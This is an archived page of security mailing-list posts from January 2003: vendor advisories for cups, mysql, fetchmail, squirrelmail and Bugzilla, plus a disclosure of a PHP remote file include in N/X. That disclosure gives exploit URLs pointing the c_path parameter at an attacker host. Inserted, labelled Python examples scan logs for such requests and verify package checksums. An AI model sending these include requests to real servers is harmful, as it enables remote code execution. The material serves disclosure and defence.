SuSE Security Announcement: cups (SuSE-SA:2003:002)

2003-01-02 Thread Thomas Biege
-BEGIN PGP SIGNED MESSAGE-

__

SuSE Security Announcement

Package:                cups
Announcement-ID:        SuSE-SA:2003:002
Date:                   Thursday, Jan 2nd 2003 09:30 MEST
Affected products:      7.1, 7.2, 7.3, 8.0, 8.1
                        SuSE Linux Enterprise Server 8
                        UnitedLinux 1.0
Vulnerability Type:     local and remote privilege escalation
Severity (1-10):        7
SuSE default package:   since 8.1: yes
                        prior 8.1: no
Cross References:       CAN-2002-1366
                        CAN-2002-1367
                        CAN-2002-1368
                        CAN-2002-1369
                        CAN-2002-1371
                        CAN-2002-1372
                        CAN-2002-1383
                        CAN-2002-1384


Content of this advisory:
1) security vulnerability resolved: several bugs
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds:
 - none
3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

CUPS is a well known and widely used printing system for unix-like
systems. iDEFENSE reported several security issues with CUPS that can
lead to local and remote root compromise. The following list
includes all vulnerabilities:
  - integer overflow in HTTP interface to gain remote
    access with CUPS privileges
  - local file race condition to gain root (bug mentioned
    above has to be exploited first)
  - remotely add printers
  - remote denial-of-service attack due to negative length in
    memcpy() call
  - integer overflow in image handling code to gain higher privileges
  - gain local root due to buffer overflow of 'options' buffer
  - design problem to gain local root (needs added printer, see above)
  - wrong handling of zero width images can be abused to gain higher
    privileges
  - file descriptor leak and denial-of-service due to missing checks
    of return values of file/socket operations

Since SuSE 8.1 CUPS is the default printing system.

As a temporary workaround CUPS can be disabled and an alternative
printing system like LPRng can be installed instead.

New CUPS packages are available on our FTP servers. Please, install
them to fix your system.

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.



Intel i386 Platform:

SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-1.1.15-69.i586.rpm
  2531f8cf2c7ffbc45f5bdabbad31b312
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-1.1.15-69.i586.patch.rpm
  048c97ac172f3a838bb3e4789250cd56

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-libs-1.1.15-69.i586.rpm
  3daffc6cac8a067c2a8b52768ada25a0
patch rpm(s):

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-libs-1.1.15-69.i586.patch.rpm
  74045133ea1780aa311dab78af0ea7a5

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-client-1.1.15-69.i586.rpm
  593fedd856a9568147f76e70cdd32b94
patch rpm(s):

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-client-1.1.15-69.i586.patch.rpm
  9a67ef7fd0162283d662581866a68263

source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/cups-1.1.15-69.src.rpm
  cad9236a0f71d1ad263c4c79e6d4337f

SuSE-8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/cups-1.1.12-90.i386.rpm
  9d1d9c3cc395e6355da6f8f1b9ccee5c
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/cups-1.1.12-90.i386.patch.rpm
  b17bfb78daac61a05c92e938e2d89463

ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/cups-libs-1.1.12-90.i386.rpm
  9ec263cb51c223798818509f50246ec9
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/cups-libs-1.1.12-90.i386.patch.rpm
  a59edfa5ba38116ccd4c264863c4bbf8

ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/cups-client-1.1.12-90.i386.rpm
  fef9316839a2747111201b5e035295ad
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/cups-client-1.1.12-90.i386.patch.rpm
  80525203e712a959badab348d07f81a9

source rpm(s):
ftp://f

GLSA: leafnode

2003-01-02 Thread Daniel Ahlberg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200301-2
- - 

PACKAGE : leafnode
SUMMARY : denial of service
DATE    : 2003-01-02 11:01 UTC
EXPLOIT : local and remote

- - 

- From leafnode advisory:

"This vulnerability can make leafnode's nntpd server, named leafnode, go
into an unterminated loop when a particular article is requested. The
connection becomes irresponsive, and the server hogs the CPU. The client
will have to terminate the connection and connect again, and may fall
prey to the same problem; ultimately, there may be so many leafnode
processes hogging the CPU that no serious work is possible any more and
the super user has to kill all running leafnode processes."

Read the full advisory at
http://marc.theaimsgroup.com/?l=bugtraq&m=104127108823436&w=2

SOLUTION

It is recommended that all Gentoo Linux users who are running
new-news/leafnode-1.9.24 or earlier update their systems as 
follows:

emerge rsync
emerge leafnode
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+FB2kfT7nyhUpoZMRAuaNAJ0UrCD8EC3dBOO6SSTMC/yDWj1KpACgqNCi
I7R5t+COhHyCvR1l3LBg+Zk=
=7hvP
-END PGP SIGNATURE-



SuSE Security Announcement: mysql (SuSE-SA:2003:003)

2003-01-02 Thread Sebastian Krahmer

-BEGIN PGP SIGNED MESSAGE-

__

SuSE Security Announcement

Package:                mysql
Announcement-ID:        SuSE-SA:2003:003
Date:                   Thu Jan  2 15:00:00 MET 2003
Affected products:      7.1, 7.2, 7.3, 8.0, 8.1,
                        SuSE Linux Enterprise Server 7,
                        SuSE Linux Enterprise Server 8,
                        SuSE Linux Connectivity Server,
                        SuSE Linux Office Server,
                        UnitedLinux 1.0
Vulnerability Type:     remote command execution
Severity (1-10):        6
SuSE default package:   no
Cross References:       http://security.e-matters.de/advisories/042002.html

Content of this advisory:
1) security vulnerability resolved: Signedness issue and password
   checking in mysqld, buffer overflow in mysqlclient library.
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds: grub
3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

Stefan Esser from e-matters reported various bugs in MySQL. Within the
MySQL server the password checking and a signedness issue have been fixed.
These could lead to a remote compromise of the system running an unpatched
MySQL server. In order to exploit this bug, the remote attacker needs a
valid MySQL account.
   Further, a buffer overflow in the mysqlclient library has been reported
and fixed. Applications using this library (as commonly used from within
PHP scripts) are vulnerable to this attack and could also be compromised
by remote attackers.

Since there is no workaround possible except shutting down the MySQL
server, we strongly recommend an update.

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.

To be sure the update takes effect you have to restart the MySQL server
by executing the following command as root:

/etc/rc.d/mysql restart

If you run applications which utilize the mysqlclient library (i.e. software
that accesses a MySQL database server) make sure you restart them again to
force the use of the patched libraries.

We thank MySQL Product and Release Engineer Lenz Grimmer as well as
e-matters Stefan Esser who discovered the bugs for their commitment to
security matters and the communication of them.


i386 Intel Platform:

SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-3.23.52-44.i586.rpm
  3d6ede325e9abb155ec043c7b3406963

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-client-3.23.52-44.i586.rpm
  7de01d80d0d04ef09c16d490da20eb80

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-devel-3.23.52-44.i586.rpm
  1b04831d6c838ee98ae76626b632640a
patch rpm(s):

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-3.23.52-44.i586.patch.rpm
  6e054f2f7a2f698d45424f939031b59f

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-client-3.23.52-44.i586.patch.rpm
  4339ae7b1bf4c792529eec784d0dbf9a

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-devel-3.23.52-44.i586.patch.rpm
  c797f92a05aff6cf202597e5b132e91a
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/mysql-3.23.52-44.src.rpm
  d9ee023e43fe6fba95a2d06a74ecc7de

SuSE-8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap2/mysql-3.23.48-78.i386.rpm
  690c230feee9f1fe70c1c749a2869002
ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap2/mysql-client-3.23.48-78.i386.rpm
  c9f595ef30a4b509145343d71e2883a3
ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap3/mysql-devel-3.23.48-78.i386.rpm
  cebe56578cda9c7e2abf66f37b5f4e92
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap2/mysql-3.23.48-78.i386.patch.rpm
  a895a353044c5f1e3b3e3ad604154b44

ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap2/mysql-client-3.23.48-78.i386.patch.rpm
  f25cf16f4137087358fca3afb483a060

ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap3/mysql-devel-3.23.48-78.i386.patch.rpm
  51a37bc09a2166985f64dcb3ca32b310
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/mysql-3.23.48-78.src.rpm
  8ef39453726a5718dfd04e96d4dda563

SuSE-7.3:
ftp://ftp.suse.com/pub/suse

[SECURITY] [DSA 220-1] New squirrelmail packages fix cross site scripting problem

2003-01-02 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 220-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
January 2nd, 2003   http://www.debian.org/security/faq
- --

Package: squirrelmail
Vulnerability  : cross site scripting
Problem-Type   : remote
Debian-specific: no
CVE Id : CAN-2002-1341
BugTraq Id : 6302

A cross site scripting vulnerability has been discovered in
squirrelmail, a feature-rich webmail package written in PHP4.
Squirrelmail doesn't sanitize user provided variables in all places,
leaving it vulnerable to a cross site scripting attack.

For the current stable distribution (woody) this problem has been
fixed in version 1.2.6-1.3.  The old stable distribution (potato) is
not affected since it doesn't contain a squirrelmail package.

An updated package for the current unstable distribution (sid) is
expected soon.

We recommend that you upgrade your squirrelmail package.

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.3.dsc
  Size/MD5 checksum:  586 235dead908e8caeb873678575c1700c8

http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.3.diff.gz
  Size/MD5 checksum:15421 414b1afacc8880479f6a41b85cd79a73

http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6.orig.tar.gz
  Size/MD5 checksum:  1856087 be9e6be1de8d3dd818185d596b41a7f1

  Architecture independent components:


http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.3_all.deb
  Size/MD5 checksum:  1839686 8daaac2603c171b94bf5def5942f451a


  These files will probably be moved into the stable distribution on
  its next revision.

- -
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE+FFTTW5ql+IAeqTIRAiCNAJ9SLmRKDgD/cg1FmehCjg1XYYaLdQCgtJes
HzpOTMqmwxejtVwx++hcvhY=
=COcy
-END PGP SIGNATURE-




GLSA: xpdf

2003-01-02 Thread Daniel Ahlberg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200301-1
- - 

PACKAGE : xpdf
SUMMARY : integer overflow
DATE    : 2003-01-02 10:01 UTC
EXPLOIT : local and remote

- - 

- From iDEFENSE advisory:

"The pdftops filter in the Xpdf and CUPS packages contains an integer 
overflow that can be exploited to gain the privileges of the target user 
or in some cases the increased privileges of the 'lp' user if installed 
setuid. There are multiple ways of exploiting this vulnerability."

Read the full advisory at
http://www.idefense.com/advisory/12.23.02.txt

SOLUTION

It is recommended that all Gentoo Linux users who are running
app-text/xpdf-1.01-r1 or earlier update their systems as 
follows:

emerge rsync
emerge xpdf
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+FBHDfT7nyhUpoZMRArLLAJwJ/iqCxaKfUqvTSC6jXFTlwhA25ACfXosJ
CM9T0JTkOYDhJIVj7xgZ/5A=
=qDHF
-END PGP SIGNATURE-



N/X (PHP)

2003-01-02 Thread Frog Man
Information :
°°
Website : http://nxwcms.sourceforge.net/
Version : 2002 PreRelease 1
Problem : Include file

PHP Code/Location :
°°°
nx/common/cds/menu.inc.php :
---
[...]
	require_once $c_path."common/lib/launch.inc.php";
[...]
---

nx/common/dbo/datasets.php :
---

	require_once $c_path."common/dbo/saveset.php";
	require_once $c_path."common/dbo/recordset.php";
	require_once $c_path."common/dbo/deleteset.php";
	require_once $c_path."common/dbo/updateset.php";
	require_once $c_path."common/dbo/insertset.php";
[...]
---

nx/common/lib/mass_opeations.inc.php :
---

 require_once $c_path."common/lib/launch.inc.php";
 require_once $c_path."common/cds/menu.inc.php";
[...]
---

etc...

Exploits :
°°

http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ with :
http://[attacker]/common/lib/launch.inc.php


http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php


etc...

Solution :
°°
Add this line in bugged files :
-
if (!file_exists($c_path."index.php")){ die("Path not found."); }
-

A patch can be found on http://www.phpsecure.org .

More details :
°°
In French :
http://www.frog-man.org/tutos/NX.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNX.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n
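
Added example (not part of the original post and not N/X code): a Python check that scans web server access logs for the request pattern described above, where the c_path parameter of a .php request is set to a remote URL. The log format (Apache common/combined) and the sample lines are assumptions; only the parameter name and file paths come from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter name taken from the post; the rest of this script is an assumption.
INCLUDE_PARAM = "c_path"
# A value starting with "scheme://" is one PHP's URL wrappers could fetch remotely.
REMOTE_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# Request field of an Apache common/combined log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Jan/2003:10:00:01 +0100] '
    '"GET /nx/index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [02/Jan/2003:10:02:13 +0100] '
    '"GET /nx/common/cds/menu.inc.php?c_path=http://attacker.example/ HTTP/1.0" 200 312',
    '198.51.100.7 - - [02/Jan/2003:10:02:40 +0100] '
    '"GET /nx/common/dbo/datasets.php?c_path=http%3A%2F%2Fattacker.example%2F HTTP/1.0" 200 298',
    '203.0.113.9 - - [02/Jan/2003:10:05:00 +0100] '
    '"GET /nx/index.php?c_path=../ HTTP/1.0" 200 100',
]


def remote_include_value(target):
    """Return the decoded c_path value if a .php request points it at a URL."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".php"):
        return None
    # parse_qsl percent-decodes once, which is what PHP does before it
    # populates the variable, so encoded and plain forms are both caught.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == INCLUDE_PARAM and REMOTE_RE.match(value):
            return value
    return None


def scan(lines):
    """Return (line number, client, script path, c_path value) per hit."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        request = REQUEST_RE.search(line)
        if not request:
            continue
        target = request.group("target")
        value = remote_include_value(target)
        if value is not None:
            client = line.split(" ", 1)[0]
            hits.append((lineno, client, urlsplit(target).path, value))
    return hits


if __name__ == "__main__":
    for lineno, client, script, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} set {INCLUDE_PARAM}={value!r} on {script}")
```

Only the query string is visible in an access log; a c_path value supplied in a POST body or cookie would not appear there.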





SuSE Security Announcement: fetchmail (SuSE-SA:2003:001)

2003-01-02 Thread Thomas Biege
-BEGIN PGP SIGNED MESSAGE-

__

SuSE Security Announcement

Package:                fetchmail
Announcement-ID:        SuSE-SA:2003:001
Date:                   Thursday, Jan 2nd 2003 09:30 MEST
Affected products:      7.1, 7.2, 7.3, 8.0, 8.1
                        SuSE eMail Server 3.1
                        SuSE eMail Server III
                        SuSE Firewall Adminhost VPN
                        SuSE Linux Admin-CD for Firewall
                        SuSE Firewall on CD 2 - VPN
                        SuSE Firewall on CD 2
                        SuSE Linux Connectivity Server
                        SuSE Linux Enterprise Server 7
                        SuSE Linux Enterprise Server 8
                        SuSE Linux Office Server
                        UnitedLinux 1.0
Vulnerability Type:     remote compromise
Severity (1-10):        4
SuSE default package:   yes
Cross References:       CAN-2002-1365

Content of this advisory:
1) security vulnerability resolved:
 - heap buffer overflow while expanding email addresses
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds:
- none
3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

fetchmail is used to download emails from POP-, IMAP-, ETRN- or ODMR-
servers.
Stefan Esser of e-matters reported a bug in fetchmail's mail address
expanding code which can lead to remote system compromise.
When fetchmail expands email addresses in mail headers it does not
allocate enough memory. An attacker can send a maliciously formatted mail
header to exhaust the memory allocated by fetchmail to overwrite parts of
the heap. This can be exploited to execute arbitrary code.

There is no temporary fix known. Please install the new packages from
our FTP servers.

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.


Intel i386 Platform:

SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/fetchmail-5.9.13-54.i586.rpm
  9a8a8d20e57dd5552fc35c1d17d8f5b2
patch rpm(s):

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/fetchmail-5.9.13-54.i586.patch.rpm
  9bfc1e8511d3be0da42cc32b06ffef47
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/fetchmail-5.9.13-54.src.rpm
  8e1310dfe46748320b1c92813a1e9294

SuSE-8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/fetchmail-5.9.0-279.i386.rpm
  3be7d683cabd44a5f83b1c0f50a1b1e9
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/fetchmail-5.9.0-279.i386.patch.rpm
  38c7c2cca1db2e524b1e4f29ef1e8606
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/fetchmail-5.9.0-279.src.rpm
  d63b65fa7ddba8f93ffc47fa3fc84fe4

SuSE-7.3:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/fetchmail-5.9.0-280.i386.rpm
  32e4614b5cdf6afea748036e70d80bab
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/fetchmail-5.9.0-280.src.rpm
  299b9512dbe87c8e16f14d28288115d3

SuSE-7.2:
ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/fetchmail-5.8.0-78.i386.rpm
  f3267936cae7fc659007291ac15f42b4
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/fetchmail-5.8.0-78.src.rpm
  318d9781b715741cc9d27b102544d30a

SuSE-7.1:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/fetchmail-5.6.5-40.i386.rpm
  311076babc7c2a75b13f24a446327ced
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/fetchmail-5.6.5-40.src.rpm
  55c64a56f10aa2904955188b1a40a34a



Sparc Platform:

SuSE-7.3:
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/fetchmail-5.9.0-66.sparc.rpm
  5a2abaab7029167944512b8aab306770
source rpm(s):
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/fetchmail-5.9.0-66.src.rpm
  95725d5f8aa677641ea1b041222ed8be



AXP Alpha Platform:

SuSE-7.1:
ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/fetchmail-5.6.5-30.alpha.rpm
  ad4833f9e2a4e6bf31336f2dc363d3e1
source rpm(s):
ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/fetchmail-5.6.5-30.src.rpm
  ac786b49dcbf71357b4894c0b4fd4b55



PPC Power PC Platform:

SuSE-7.
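
Added example (not part of any of the advisories): a Python parser for the "URL line followed by MD5 line" package lists used in the SuSE and Debian messages above, plus a check of a downloaded file against the listed digest. The sample text is copied from lines on this page, including one URL that was cut off in the archive; the function names are hypothetical. A matching MD5 only ties the file to the advisory text, so it is worth no more than the PGP signature on that text, and MD5 is no longer collision resistant.

```python
import hashlib
import os
import re

URL_RE = re.compile(r"^\s*((?:ftp|https?)://\S+)\s*$")
# SuSE prints the bare digest; Debian prefixes it with "Size/MD5 checksum: <size>".
MD5_RE = re.compile(r"^\s*(?:Size/MD5 checksum:\s*\d+\s+)?([0-9a-f]{32})\s*$")

# Lines copied from the advisories on this page; the last URL is truncated there.
SAMPLE_ADVISORY = """\
SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/fetchmail-5.9.13-54.i586.rpm
  9a8a8d20e57dd5552fc35c1d17d8f5b2
patch rpm(s):

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/fetchmail-5.9.13-54.i586.patch.rpm
  9bfc1e8511d3be0da42cc32b06ffef47
http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.3_all.deb
  Size/MD5 checksum:  1839686 8daaac2603c171b94bf5def5942f451a
source rpm(s):
ftp://f
"""


def parse_checksums(advisory_text):
    """Map file name -> MD5 hex digest for every URL that has a digest after it."""
    expected, pending = {}, None
    for line in advisory_text.splitlines():
        url = URL_RE.match(line)
        if url:
            pending = url.group(1)
            continue
        digest = MD5_RE.match(line)
        if digest and pending:
            expected[pending.rsplit("/", 1)[-1]] = digest.group(1)
        if line.strip():
            # Any other non-blank line ends the pair; a URL left without a
            # digest (a truncated message, for instance) is dropped.
            pending = None
    return expected


def verify(path, expected):
    """Return 'ok', 'MISMATCH' or 'unlisted' for one downloaded file."""
    name = os.path.basename(path)
    if name not in expected:
        return "unlisted"
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return "ok" if digest.hexdigest() == expected[name] else "MISMATCH"


if __name__ == "__main__":
    import sys
    table = parse_checksums(sys.stdin.read())
    for package in sys.argv[1:]:
        print(verify(package, table), package)
```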

Re: Filtering devices spotting

2003-01-02 Thread Darren Reed
In some mail from Ed3f, sie said:
> 
> 
>  SECURITY ALERT 
> 
> 
> Systems Affected
> 
>   100% of packet filtering systems included commercial
>   embedded devices
>   (no unaffected system known at the moment)

Well, not quite 100%...

You have been able to filter on bad TCP checksums in IPFilter for
some time - see this email message from me to the ipfilter list some
4 months ago:

http://false.net/ipfilter/2002_08/0250.html

I'm trying to get other things done and fixed before saying "4.0 is
no longer alpha".

Darren




Re: Potential disclosure of sensitive information in Netscape 7.0 email client

2003-01-02 Thread Bartek Raszczyk
Hello Michael,

Wednesday, January 1, 2003, 12:19:49 PM, you wrote:

MP> Netscape 7.0 includes, as part of its release, an email client, capable of
MP> handling POP3 and IMAP accounts. The method that the email client utilizes
MP> to permanently delete email messages is not explained, which could lead to
MP> users having large quantities of email messages, which they would think of
MP> as permanently deleted, still stored in clear text on their hard disks.

  The same applies to Ritlab's The Bat! (up to version 1.60c I'm
  currently using).

  The Bat! stores all of the messages in
  $thebathome\mail\$accountname\$foldername\Messages.tbb and
  status information in Messages.tbi (without customization and
  message filtering all mail goes to $foldername named inbox).
  All messages remain there until Folder|Compress function is used.

  The question is - is that a feature or a bug?
  I'm using The Bat! for nearly three years now and it's there
  from where I can remember (although there were dozen or so version changes).


-- 
Best regards,
 Bartek Raszczyk   mailto:[EMAIL PROTECTED]




[BUGZILLA] Security Advisory - remote database password disclosure

2003-01-02 Thread David Miller
Bugzilla Security Advisory

January 2nd, 2002

Severity: major (remote database password disclosure, bug 186383)
  minor (local file permissions, bug 183188)

Summary
===

All Bugzilla installations are advised to upgrade to the latest versions
of Bugzilla, 2.14.5 and 2.16.2, both released today. Security issues of
varying importance have been fixed in both branches.  These vulnerabilities
affect all previous 2.14 and 2.16 releases.

Development snapshots prior to version 2.17.3 are also affected, so if you
are using a development snapshot, you should obtain a newer one or use CVS
to update.

2.14.x users are additionally encouraged to upgrade to 2.16.2 as soon as
possible, as this is the last 2.14.x release and the 2.14 branch will no
longer be supported by the Bugzilla team.

This advisory covers two security bugs: one involves incorrect local
permissions on a directory, allowing local users access. The other involves
protecting configuration information leaks due to backup files created by
editors.

Vulnerability Details
=

The following security issues were fixed in 2.14.5, 2.16.2, and 2.17.3:

- The provided data collection script intended to be run as a nightly cron
  job changes the permissions of the data/mining directory to be world-
  writable every time it runs. This would enable local users to alter or
  delete the collected data.  (Bugzilla bug 183188 / Bugtraq ID 6502).

- The default .htaccess scripts provided by checksetup.pl do not block
  access to backups of the localconfig file that might be created by
  editors such as vi or emacs (typically these will have a .swp or ~
  suffix).  This allows an end user to download one of the backup copies
  and potentially obtain your database password.  If you already have such
  an editor backup in your bugzilla directory it would be advisable to
  change your database password in addition to upgrading.

  In addition, we also continue to recommend hardening access to the
  Bugzilla database user account by limiting access to the account to
  the machine Bugzilla is served from (typically localhost); consult the
  MySQL documentation for more information on how to accomplish this.
  (Bugzilla bug 186383 / Bugtraq ID 6501)

Also included in these releases are the patches that were posted as part
of our earlier security advisory on November 26th, 2002.  (Bugzilla bug
179329, Bugtraq ID 6257 - see
http://online.securityfocus.com/archive/1/301316 )

Vulnerability Solutions
===

The fixes for both security bugs contained in this release, as well as the
previously announced security bug involving cross-site scripting
vulnerabilities are contained in the 2.14.5, 2.16.2, and 2.17.3 releases.
Upgrading to these releases will protect installations against
exploitations of these security bugs.

Individual patches to upgrade Bugzilla are available at:
  http://ftp.mozilla.org/pub/webtools/
  (these patches are only valid for 2.14.4 and 2.16.1 users).

Full release downloads and CVS upgrade instructions are available at:
  http://www.bugzilla.org/download.html

References
==

Complete bug reports for the security bugs covered herein may be obtained
at:
   http://bugzilla.mozilla.org/show_bug.cgi?id=183188
   http://bugzilla.mozilla.org/show_bug.cgi?id=186383

General information about the Bugzilla bug-tracking system can be found at
   http://www.bugzilla.org/

Comments and follow-ups can be directed to the
netscape.public.mozilla.webtools newsgroup or the mozilla-webtools mailing
list; http://www.mozilla.org/community.html has directions for accessing
these forums.

-30-
-- 
Dave Miller  Project Leader, Bugzilla Bug Tracking System
http://www.justdave.net/ http://www.bugzilla.org/
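
Added example (not part of the advisory and not Bugzilla code): a Python audit of an installation directory for the two conditions described above, namely editor copies of localconfig that the .htaccess rules do not deny, and a world-writable data/mining directory. The FilesMatch parsing and the "any other file name containing localconfig" heuristic are assumptions, not the rules checksetup.pl writes.

```python
import os
import re
import stat

# <FilesMatch PATTERN> ... </FilesMatch> blocks in an Apache .htaccess file.
FILESMATCH_RE = re.compile(
    r"<FilesMatch\s+\"?(?P<pat>[^\s\">]+)\"?\s*>(?P<body>.*?)</FilesMatch>",
    re.IGNORECASE | re.DOTALL,
)
DENY_RE = re.compile(r"^\s*deny\s+from\s+all\b", re.IGNORECASE | re.MULTILINE)


def denied_patterns(htaccess_text):
    """Compile each FilesMatch pattern whose block contains 'deny from all'."""
    patterns = []
    for block in FILESMATCH_RE.finditer(htaccess_text):
        if DENY_RE.search(block.group("body")):
            try:
                patterns.append(re.compile(block.group("pat")))
            except re.error:
                pass  # pattern not expressible in Python's regex syntax
    return patterns


def is_localconfig_copy(name):
    """Heuristic: localconfig~, .localconfig.swp, #localconfig#, localconfig.bak ..."""
    return name != "localconfig" and "localconfig" in name


def audit(root):
    """Return (finding, item) tuples for the Bugzilla directory `root`."""
    findings, rules = [], []
    htaccess = os.path.join(root, ".htaccess")
    if os.path.isfile(htaccess):
        with open(htaccess, encoding="utf-8", errors="replace") as fh:
            rules = denied_patterns(fh.read())
    for name in sorted(os.listdir(root)):
        if is_localconfig_copy(name) and os.path.isfile(os.path.join(root, name)):
            # Apache applies FilesMatch as an unanchored search on the file name.
            blocked = any(rule.search(name) for rule in rules)
            findings.append(("backup-blocked" if blocked else "backup-exposed", name))
    mining = os.path.join(root, "data", "mining")
    if os.path.isdir(mining) and os.stat(mining).st_mode & stat.S_IWOTH:
        findings.append(("world-writable", "data/mining"))
    return findings


if __name__ == "__main__":
    import sys
    for finding, item in audit(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(finding, item)
```

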